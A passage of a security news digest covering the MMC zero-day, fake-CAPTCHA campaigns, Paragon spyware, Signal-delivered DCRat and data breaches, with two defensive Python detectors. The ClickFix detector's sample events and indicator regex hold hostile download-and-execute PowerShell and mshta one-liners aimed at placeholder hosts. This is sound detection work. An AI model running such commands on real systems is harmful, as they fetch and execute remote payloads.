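        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def find_msc_twins(root: str) -> List[Tuple[str, str]]:
    """Return (console, twin) pairs where a .msc file has a same-named .msc in a
    locale subfolder next to it, the layout the EvilTwin technique relies on."""
    twins: List[Tuple[str, str]] = []
    for dirpath, dirnames, filenames in os.walk(root):
        locale_dirs = [d for d in dirnames if LOCALE_DIR.match(d)]
        for fn in filenames:
            if not fn.lower().endswith(".msc"):
                continue
            for sub in locale_dirs:
                candidate = os.path.join(dirpath, sub, fn)
                if os.path.isfile(candidate):
                    twins.append((os.path.join(dirpath, fn), candidate))
    return twins


def describe(twins: List[Tuple[str, str]]) -> List[Tuple[str, str, bool]]:
    """Add whether the twin's content differs from the visible console."""
    return [(c, t, sha256_of(c) != sha256_of(t)) for c, t in twins]


def build_sample_tree() -> str:
    """Constructed layout for the demo: one console with a locale twin and one
    without. Contents are placeholders, not real MMC console XML."""
    root = tempfile.mkdtemp(prefix="msc-twin-demo-")
    tools = os.path.join(root, "Tools")
    os.makedirs(os.path.join(tools, "en-US"))
    with open(os.path.join(tools, "manage.msc"), "w") as f:
        f.write("<MMC_ConsoleFile> clean placeholder </MMC_ConsoleFile>")
    with open(os.path.join(tools, "en-US", "manage.msc"), "w") as f:
        f.write("<MMC_ConsoleFile> placeholder standing in for the rogue console </MMC_ConsoleFile>")
    with open(os.path.join(tools, "other.msc"), "w") as f:
        f.write("<MMC_ConsoleFile> benign, no twin </MMC_ConsoleFile>")
    return root


if __name__ == "__main__":
    for console, twin, differs in describe(find_msc_twins(build_sample_tree())):
        print(f"{console} -> {twin} (content differs: {differs})")
```

Legitimate consoles do not normally ship a localized copy in a folder the user created next to them, so on user-writable paths (downloads, temp, profile folders) any hit is worth examining; the same check run on a known-good system image gives the baseline for system folders.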

Recommended read:
References :
  • The DefendOps Diaries: Understanding the CVE-2025-26633 Vulnerability in Microsoft Management Console
  • www.trendmicro.com: Trend Research identified Russian threat actor Water Gamayun exploiting CVE-2025-26633, a zero-day vulnerability in the Microsoft Management Console that attackers exploit to execute malicious code and exfiltrate data.
  • Cyber Security News: Hackers Exploit Windows MMC Zero-Day Vulnerability to Execute Malicious Code
  • BleepingComputer: A threat actor known as EncryptHub has been linked to Windows zero-day attacks exploiting a Microsoft Management Console vulnerability patched this month.
  • gbhackers.com: Windows MMC Framework Zero-Day Exploited to Execute Malicious Code
  • www.scworld.com: Windows-targeted EncryptHub attacks involve MMC zero-day exploitation
  • bsky.app: EncryptHub, an affiliate of RansomHub, was behind recent MMC zero-day patched this month by Microsoft
  • The Hacker News: EncryptHub Exploits Windows Zero-Day to Deploy Rhadamanthys and StealC Malware
  • Virus Bulletin: Trend Micro researchers identified a campaign by the Russian threat actor Water Gamayun exploiting CVE-2025-26633, a zero-day vulnerability in the Microsoft Management Console that attackers exploit to execute malicious code and exfiltrate data.
  • www.cybersecuritydive.com: A threat actor known as “EncryptHub” began exploiting the zero-day vulnerability before it was patched earlier this month.
  • : Trend Micro researchers identified a campaign by the Russian threat actor Water Gamayun exploiting CVE-2025-26633, a zero-day vulnerability in the Microsoft Management Console that attackers exploit to execute malicious code and exfiltrate data.
  • www.trendmicro.com: Trend Research discusses the delivery methods, custom payloads, and techniques used by Water Gamayun, the suspected Russian threat actor abusing a zero-day vulnerability in the Microsoft Management Console framework (CVE-2025-26633) to execute malicious code on infected machines.

Andres Ramos@Arctic Wolf //
A resurgence of a fake CAPTCHA malware campaign has been observed, with threat actors compromising widely used websites across various industries. They are embedding a fake CAPTCHA challenge that redirects victims to a site triggering PowerShell code execution. This campaign exploits social engineering tactics and fake software downloads to deceive users into executing malicious scripts.

The same lure appears on fake CAPTCHA pages that imitate legitimate verification prompts. When the user tries to pass the CAPTCHA, the page silently copies a command to the clipboard and instructs them to paste and run it (typically in the Windows Run dialog), which executes the attacker's PowerShell. The OBSCURE#BAT campaign, one such fake-CAPTCHA operation, is a serious threat to individuals and organizations because it compromises sensitive data while evading detection through techniques such as API hooking, which lets the malware hide its files and registry entries.
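
The paste-into-Run step leaves a recognisable process tree: explorer.exe spawning a script host whose command line downloads and runs something. The detector below is an added example, not from Arctic Wolf, Trustwave or Securonix, and runs over constructed process-creation events shaped like Sysmon Event ID 1 records (ParentImage, Image, CommandLine). The set of script hosts and the command-line indicators are assumptions chosen to cover the common shape of these one-liners.

```python
import re
from typing import Dict, List

# Script hosts the pasted one-liner typically launches (assumption: common set).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe"}

# Download-and-execute indicators seen in clipboard one-liners (assumption).
INDICATORS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s|\biex\b|invoke-expression|"
    r"\birm\b|invoke-webrequest|downloadstring|https?://|\bmshta\b)",
    re.IGNORECASE,
)


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def is_clickfix_like(event: Dict[str, str]) -> bool:
    """Parent is explorer.exe (what the Run dialog launches from), child is a
    script host, and the command line carries download-and-execute indicators."""
    parent = _basename(event.get("ParentImage", ""))
    child = _basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    return parent == "explorer.exe" and child in SCRIPT_HOSTS and bool(INDICATORS.search(cmd))


def scan_events(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    return [e for e in events if is_clickfix_like(e)]


# Constructed events; hostnames use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -w hidden -c "iex (irm https://verify.example.invalid/v.ps1)"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://verify.example.invalid/c.hta"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},
]

if __name__ == "__main__":
    for e in scan_events(SAMPLE_EVENTS):
        print(f"suspicious: {_basename(e['Image'])} <- explorer.exe : {e['CommandLine']}")
```

The third event (an admin script launched from a shell) and the fourth (an interactive PowerShell opened from the Start menu) are the false positives the parent and indicator conditions are there to exclude; a real deployment would also correlate with the RunMRU registry key and with what the clipboard contained, neither of which this offline example models.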

Recommended read:
References :
  • Arctic Wolf: Widespread Fake CAPTCHA Campaign Delivering Malware
  • hackread.com: New OBSCURE#BAT Malware Targets Users with Fake Captchas
  • Security Risk Advisors: 🚩 Fake CAPTCHA Malware Campaign Resurges With Multi-Stage PowerShell Infostealers
  • SpiderLabs Blog: Resurgence of a Fake Captcha Malware Campaign
  • www.zdnet.com: That weird CAPTCHA could be a malware trap - here's how to protect yourself
  • Seceon Inc: Beware of Fake CAPTCHA Scams: How Cybercriminals Are Hijacking Your Clipboard to Steal Data
  • www.cysecurity.news: Fake CAPTCHA Scams Trick Windows Users into Downloading Malware
  • : Attackers Use Fake CAPTCHAs to Deploy Lumma Stealer RAT
  • Broadcom Software Blogs: In a recent surge of sophisticated cyber threats, attackers are exploiting fake CAPTCHA verifications to hijack users’ clipboards, leading to the installation of information-stealing malware.
  • Security Risk Advisors: ClearFake injects JavaScript to show fake CAPTCHAs on compromised sites, tricking users into running PowerShell for Lumma/Vidar malware.
  • www.cisecurity.org: The CIS CTI team spotted a Lumma Stealer campaign where SLTT victims were redirected to malicious webpages delivering fake CAPTCHA verifications.
  • gbhackers.com: Attackers Leverage Weaponized CAPTCHAs to Execute PowerShell and Deploy Malware
  • Sucuri Blog: Sucuri Blog: Fake Cloudflare Verification Results in LummaStealer Trojan Infections
  • securityonline.info: Fake Cloudflare Verification Prompts Deliver LummaStealer Trojan Through Infected WordPress Sites

Paolo Tarsitano@Cyber Security 360 //
Citizen Lab researchers have identified several countries as potential customers of Paragon Solutions' Graphite spyware, which was used in attacks against human rights defenders. The investigation mapped the infrastructure of the Israel-based spyware maker, identifying servers likely used by customers in Australia, Canada, Cyprus, Denmark, Israel, and Singapore. The findings follow WhatsApp's notification to numerous individuals that Paragon exploited the platform to deliver spyware to their phones.

The Citizen Lab report includes an infrastructure analysis of Graphite, a forensic analysis of infected devices belonging to members of civil society, and a closer look at the spyware's use in Canada and Italy. Meta (WhatsApp) said Citizen Lab's findings were pivotal to its ongoing investigation into Paragon and that it has fixed the zero-click exploit vector the spyware used against the platform.

Paragon’s executive chairman, John Fleming, responded that Citizen Lab shared only a "very limited amount of information" beforehand, "some of which appears to be inaccurate," while declining to specify what was inaccurate. Despite Paragon's claims of selling only to democracies, the report raises concerns about potential abuse, suggesting their safeguards may not be sufficient.

Recommended read:
References :
  • infosec.exchange: Researchers mapped out the infrastructure of spyware maker Paragon Solutions, and say they were able to identify servers likely used by customers in several countries: Australia, Canada, Cyprus, Denmark, Israel, and Singapore. Paragon’s executive chairman John Fleming said Citizen Lab shared in advance "very limited amount of information, some of which appears to be inaccurate." He declined to say what was inaccurate exactly.
  • The Citizen Lab: In our first investigation into Israel-based spyware company, Paragon Solutions, we begin to untangle multiple threads connected to the proliferation of Paragon's mercenary spyware operations across the globe. This report includes an infrastructure analysis of Paragon’s spyware product, called Graphite; a forensic analysis of infected devices belonging to members of civil society; and a closer look at the use of Paragon spyware in both Canada and Italy.
  • techcrunch.com: Researchers name several countries as potential Paragon spyware customers
  • CyberInsider: Paragon’s Spyware ‘Graphite’ Used in WhatsApp Attacks
  • securityaffairs.com: WhatsApp fixed zero-day flaw used to deploy Paragon Graphite spyware
  • Zack Whittaker: Researchers at Citizen Lab have named several countries as potential customers of Paragon's Graphite spyware, which Citizen Lab says was used in a widespread campaign targeting human rights defenders in Italy.
  • Metacurity: Australia, Canada, Cyprus, Denmark, Israel, and Singapore likely bought Paragon spyware, Citizen Lab
  • The Hacker News: Six Governments Likely Use Israeli Paragon Spyware to Hack IM Apps and Harvest Data
  • BleepingComputer: WhatsApp patched zero-day flaw used in Paragon spyware attacks
  • Cyber Security 360: Italy spied on: the Paragon Graphite spyware network revealed
  • hackread.com: Israeli Spyware Graphite Targeted WhatsApp with 0-Click Exploit
  • The Register - Security: Paragon spyware deployed against journalists and activists, Citizen Lab claims
  • Christoffer S.: "A First Look at Paragon's Proliferating Spyware Operations" investigates Paragon Solutions, an Israeli spyware vendor founded in 2019 that sells a product called Graphite.
  • IT-Connect: A zero-click flaw in WhatsApp was exploited by Paragon spyware, using a simple PDF document.
  • Zack Whittaker: This week's edition of ~ this week in security ~ includes a look at Citizen Lab's report revealing Paragon spyware customers and victims, CISA scrambling to contact fired staff after court reverses layoffs, and Wiz joining Google Cloud. Plus, a brand new cyber cat, and more.

Carly Page@TechCrunch //
The Pennsylvania State Education Association (PSEA), the largest public-sector union in Pennsylvania, has announced a significant data breach affecting over 500,000 members. The breach, which occurred in July 2024, resulted in attackers stealing sensitive personal information. PSEA is now notifying the impacted individuals about the incident and the potential risks.

The stolen data includes highly sensitive information, such as government-issued identification documents, Social Security numbers, passport numbers, medical information, and financial data like card numbers with PINs and expiration dates. Member account numbers, PINs, passwords, and security codes were also accessed. PSEA took steps to ensure, to the best of its ability and knowledge, that the stolen data was deleted.

Recommended read:
References :
  • bsky.app: The Pennsylvania State Education Association (PSEA), the largest public-sector union in Pennsylvania, is notifying over half a million individuals that attackers stole their personal information in a July 2024 security breach.
  • BleepingComputer: The Pennsylvania State Education Association (PSEA), the largest public-sector union in Pennsylvania, is notifying over half a million individuals that attackers stole their personal information in a July 2024 security breach.
  • techcrunch.com: US teachers’ union says hackers stole sensitive personal data on over 500,000 members
  • www.bleepingcomputer.com: Pennsylvania education union data breach hit 500,000 people
  • The Register - Security: Attackers swipe data of 500k+ people from Pennsylvania teachers union
  • The DefendOps Diaries: Understanding the PSEA Data Breach: Lessons and Future Prevention
  • The Pennsylvania State Education Association (PSEA) has sent breach notifications to over 500,000 current and former members
  • Zack Whittaker: Pennsylvania's biggest union for educators had a data breach, exposing over half a million members' personal information.
  • securityaffairs.com: Pennsylvania State Education Association data breach impacts 500,000 individuals
  • Carly Page: The Pennsylvania State Education Association says hackers stole the sensitive personal and financial information of more than half a million of its members. PSEA said it “took steps” to ensure the stolen data was deleted, suggesting it was the target of a ransomware or data extortion attack, and subsequently paid a ransom demand to the hackers responsible.
  • www.techradar.com: Data breach at Pennsylvania education union potentially exposes 500,000 victims

do son@securityonline.info //
Cybercriminals are actively exploiting the Signal messaging application to distribute an information-stealing Remote Access Trojan (RAT), raising serious privacy concerns. According to a recently published report, a threat group tracked as UAC-0200 is behind the campaign, which targets high-value individuals within Ukraine's defense sector. The Computer Emergency Response Team of Ukraine (CERT-UA) has issued warnings about this campaign, which uses the Dark Crystal RAT (aka DCRat) to compromise systems.

This malicious activity involves distributing Signal messages that appear to contain meeting minutes. The messages are sent from compromised accounts to enhance credibility, enticing unsuspecting users to download malicious archive files. The archives contain a decoy PDF and an executable that deploys the DCRat malware, giving attackers remote access and control over the system, the ability to steal valuable information, and the ability to execute arbitrary commands. CERT-UA, which attributes this activity to UAC-0200 (active since summer 2024), noted that the use of popular messengers increases the attack surface, in part because they create uncontrolled information exchange channels.

Recommended read:
References :
  • cyberinsider.com: Ukraine Warns Signal Used for Spreading RATs on High-Value Targets
  • securityonline.info: CERT-UA Alert: DarkCrystal RAT Deployed via Signal in Ukraine
  • SOC Prime Blog: Detect UAC-0200 Attacks Using DarkCrystal RAT
  • The DefendOps Diaries: Russian Cyber Espionage Targets Ukrainian Military via Signal
  • BleepingComputer: Ukrainian military targeted in new Signal spear-phishing attacks
  • BleepingComputer: Ukraine's Computer Emergency Response Team (CERT-UA) is warning about highly targeted attacks employing compromised Signal accounts to send malware to employees of defense industry firms and members of the country's army forces.
  • securityaffairs.com: CERT-UA warns of cyber espionage against the Ukrainian defense industry using Dark Crystal RAT
  • The Hacker News: CERT-UA Warns: Dark Crystal RAT Targets Ukrainian Defense via Malicious Signal Messages
  • Sam Bent: Report: Cybercriminals Leverage Signal App to Deploy Info-Stealing RAT, Raising Privacy Concerns
  • bsky.app: CERT-UA warns of cyber espionage against the Ukrainian defense industry using Dark Crystal RAT
  • www.scworld.com: Attackers, tracked under the UAC-0200 threat cluster, leveraged the Signal messaging app to deliver messages purportedly containing minutes of the meeting reports as archive files.

@cyberalerts.io //
UAT-5918, a threat actor believed to be motivated by establishing long-term access for information theft, has been actively targeting critical infrastructure entities in Taiwan since at least 2023. Cisco Talos researchers have been tracking this campaign. The group utilizes a combination of web shells, such as the Chopper web shell, and open-sourced tooling to conduct post-compromise activities, focusing on persistence in victim environments for information theft and credential harvesting. UAT-5918 exploits N-day vulnerabilities in unpatched web and application servers exposed to the internet to gain initial access.

UAT-5918's post-compromise activities involve manual operations, emphasizing network reconnaissance and credential harvesting using tools like Mimikatz, LaZagne, and browser credential extractors. The threat actor deploys web shells across discovered sub-domains and internet-accessible servers, establishing multiple entry points. Their tactics, techniques, and procedures (TTPs) overlap with other APT groups like Volt Typhoon and Flax Typhoon, suggesting shared strategic goals in targeting geographies and industry verticals such as telecommunications, healthcare, and information technology sectors in Taiwan.

Recommended read:
References :
  • Cisco Talos Blog: UAT-5918 targets critical infrastructure entities in Taiwan
  • Industrial Cyber: UAT-5918 APT group targets Taiwan critical infrastructure, possible linkage to Volt Typhoon
  • thehackernews.com: UAT-5918 Targets Taiwan's Critical Infrastructure Using Web Shells and Open-Source Tools
  • Talkback Resources: UAT-5918 Targets Taiwan's Critical Infrastructure Using Web Shells and Open-Source Tools [ics] [net]
  • Cyber Security News: UAT-5918 Threat Actors Target Exposed Web and Application Servers via N-Day Vulnerabilities
  • gbhackers.com: UAT-5918 Hackers Exploit N-Day Vulnerabilities in Exposed Web and Application Servers
  • The DefendOps Diaries: UAT-5918, a threat actor believed to be motivated by establishing long-term access for information theft, uses a combination of web shells and open-sourced tooling to conduct post-compromise activities to establish persistence in victim environments for information theft and credential harvesting.
  • securityaffairs.com: UAT-5918 APT group targets critical Taiwan
  • www.scworld.com: UAT-5918, a threat actor believed to be motivated by establishing long-term access for information theft, uses a combination of web shells and open-sourced tooling to conduct post-compromise activities to establish persistence in victim systems.
  • Virus Bulletin: Cisco Talos researchers Jung soo An, Asheer Malhotra, Brandon White & Vitor Ventura analyse a UAT-5918 malicious campaign targeting critical infrastructure entities in Taiwan.

Bill Toulas@BleepingComputer //
OKX Web3 has suspended its DEX aggregator services following reports of abuse by the North Korean Lazarus Group, which is known for conducting a $1.5 billion crypto heist. The suspension is aimed at implementing security upgrades to prevent further abuse and protect users from illicit activities like money laundering.

OKX's response includes implementing advanced security technologies, such as multi-factor authentication and machine learning algorithms, to predict and prevent potential security breaches. The company is also collaborating with regulatory authorities to align its security measures with international standards, including stricter Know Your Customer protocols and enhanced transaction monitoring systems. These steps are part of a comprehensive security overhaul aimed at fortifying the platform against sophisticated cyber threats.

Recommended read:
References :
  • bsky.app: OKX Web3 has decided to suspend its DEX aggregator services to implement security upgrades following reports of abuse by the notorious North Korean Lazarus hackers, who recently conducted a $1.5 billion crypto heist.
  • BleepingComputer: OKX Web3 has decided to suspend its DEX aggregator services to implement security upgrades following reports of abuse by the notorious North Korean Lazarus hackers, who recently conducted a $1.5 billion crypto heist.
  • BleepingComputer: OKX suspends DEX aggregator after Lazarus hackers try to launder funds
  • The DefendOps Diaries: OKX's Strategic Response to Cyber Threats: A Comprehensive Security Overhaul
  • securityonline.info: Web3 Laundering Fears: OKX Suspends Platform Amidst Scrutiny
  • www.scworld.com: OKX tool leveraged by Lazarus Group briefly taken down

Aninda Chakraborty@Tech Monitor //
Western Alliance Bank recently disclosed a data breach impacting 21,899 customers. The incident stemmed from a vulnerability in third-party secure file transfer software, highlighting the risks of relying on external vendors for critical operations. Attackers exploited a zero-day vulnerability to exfiltrate sensitive files from the bank's systems, prompting an internal investigation after stolen files were leaked online. The breach occurred between October 12 and October 24 of the previous year, but the vendor did not disclose the vulnerability until October 27, illustrating how long it can take to discover such issues.

The compromised data included names, Social Security numbers, dates of birth, financial account details, driver's license numbers, tax identification numbers, and even passport information in some cases. The breach has been attributed to the Clop ransomware gang, which added Western Alliance Bank to its leak site after exploiting vulnerabilities in Cleo Harmony and related software. The bank is offering affected customers one year of credit monitoring as a precaution, while urging heightened vigilance for potential identity theft and fraud.

Recommended read:
References :
  • bsky.app: Arizona-based Western Alliance Bank is notifying nearly 22,000 customers their personal information was stolen in October after a third-party vendor's secure file transfer software was breached.
  • Secure Bulletin: Western Alliance Bank data breach: 21,899 customers impacted
  • The DefendOps Diaries: Understanding the Western Alliance Bank Data Breach: Lessons in Cybersecurity
  • BleepingComputer: Western Alliance Bank notifies 21,899 customers of data breach
  • Tech Monitor: Western Alliance Bank confirms data breach affecting over 21,000 customers
  • BleepingComputer: Arizona-based Western Alliance Bank is notifying nearly 22,000 customers their personal information was stolen in October after a third-party vendor's secure file transfer software was breached.
  • Information Security Buzz: Western Alliance Bank has announced a data breach affecting 21,899 people, that was caused by an October 2024 cyberattack on a third-party file transfer software.
  • www.itpro.com: Western Alliance Bank admits cyber attack exposed 22,000 customers

Dissent@DataBreaches.Net //
Recent data breaches have affected multiple organizations, exposing sensitive information and highlighting the importance of robust security measures. SOCRadar's Dark Web Team has uncovered several significant threats, including a breach at AUTOSUR, a French vehicle inspection company, where approximately 10.7 million customer records were leaked. The exposed data includes customer names, emails, phone numbers, hashed passwords, home addresses, vehicle information, and license plate numbers. This breach poses significant risks such as identity theft, phishing attacks, and financial fraud.

Unauthorized access to shipping portals associated with Lenovo and HP has also been detected, targeting shipment tracking activities in India. This breach could expose sensitive supply chain information. Furthermore, cybercriminals are actively exploiting the gaming and entertainment sectors, using tools such as a Disney+ credential checker and a leaked FiveM database. A massive dataset of crypto and forex leads is also up for sale, creating risks of fraud and financial scams. Additionally, Cardiovascular Consultants Ltd. (CVC) in Arizona experienced a ransomware attack impacting 484,000 patients, with data later appearing on a clearnet IP address associated with “WikiLeaksV2”. The breach at Sunflower and CCA impacted 220,968 individuals, according to a filing with the Maine Attorney General's Office.

Recommended read:
References :
  • socradar.io: AUTOSUR Breach, FiveM Database Leak, Disney+ Account Checker, Crypto Leads & Forex Scams Exposed
  • www.cysecurity.news: Sunflower and CCA Suffer Data Breaches, Exposing Hundreds of Thousands of Records
  • Security - Troy Hunt: Inside the "3 Billion People" National Public Data Breach
  • securityaffairs.com: California Cryobank, the largest US sperm bank, disclosed a data breach
  • MSSP feed for Latest: Data Breach Hits California Cryobank
  • infosec.exchange: Okay, this is not good: "Executive Summary On 21 March 2025, CloudSEK’s XVigil discovered a threat actor, "rose87168," selling 6M records exfiltrated from SSO and LDAP of Oracle Cloud. The data includes JKS files, encrypted SSO passwords, key files, and enterprise manager JPS keys."
  • research.kudelskisecurity.com: Oracle Cloud SSO, LDAP Records Dumped, 140k+ Tenants Affected